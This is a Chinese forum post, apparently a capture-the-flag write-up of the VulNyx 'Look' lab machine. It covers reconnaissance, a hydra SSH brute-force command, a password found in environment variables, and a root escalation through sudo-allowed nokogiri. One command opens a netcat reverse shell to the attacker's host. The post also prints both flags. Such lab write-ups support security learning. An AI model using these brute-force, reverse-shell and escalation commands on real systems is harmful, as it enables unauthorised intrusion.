找回密码
 立即注册
首页 业界区 科技 vulnyx Look writeup

vulnyx Look writeup

那虻 昨天 21:36
信息收集

arp-scan

1.png

nmap

2.png

获取userFlag

web上是一个apache默认页面
3.png

dirsearch扫下目录
4.png

扫到一个info.php,进去看一下
5.png

是一个phpinfo页面,翻一下可以找到一个用户axel
6.png

然后就是通过hydra进行爆破了
  1. hydra -l axel -P 5000.txt ssh://192.168.43.30 -V -t 64 -e nsr
复制代码
7.png

然后ssh上去
8.png

然后家目录下拿到userflag
userflag:084eb686418576cdde1ce01e2e9ad0dd
获取rootFlag

看一下/etc/passwd
9.png

发现还有一个dylan用户,那这里应该是要先拿到dylan,然后通过它提权到root。这里我翻了很久,运行了pspy64,linpeas.sh也没有看到可以利用的东西,最后看了看大佬的wp才发现dylan的密码在环境变量里:
10.png

切换到dylan用户上去,然后 sudo -l 看一下
11.png

发现可以执行nokogiri命令,这里直接执行nokogiri可以看到帮助文档
12.png

我这里是直接把帮助文档给ai了,然后得到了如下的提权方案:
  1. sudo nokogiri -e '`/bin/bash`' anyfile
复制代码
这里直接执行/bin/bash可以拿到root shell,但是得到shell里没有回显,所以我后面是通过nc来反弹shell的
  1. sudo nokogiri -e '`busybox nc 192.168.43.180 8888 -e /bin/bash`' anyfile
复制代码
13.png

这里正常的思路应该是现file看一下这个文件
14.png

可以看到它是一个ruby写的脚本,去GTFobins上找ruby的提权方案
15.png

但直接这样执行成功不了
16.png

从使用示例这里可以看到需要指定一个文件
17.png

这样就可以提权到root了,还有就是可以直接解析一个文件,然后可以进入到一个irb的界面,就相当于一个ruby shell
18.png

然后在里面执行 exec "/bin/bash"
19.png

这样也能拿到root shell
rootflag:5e1a6f7770b8836974a6da06f32ecf6e
 

来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
您需要登录后才可以回帖 登录 | 立即注册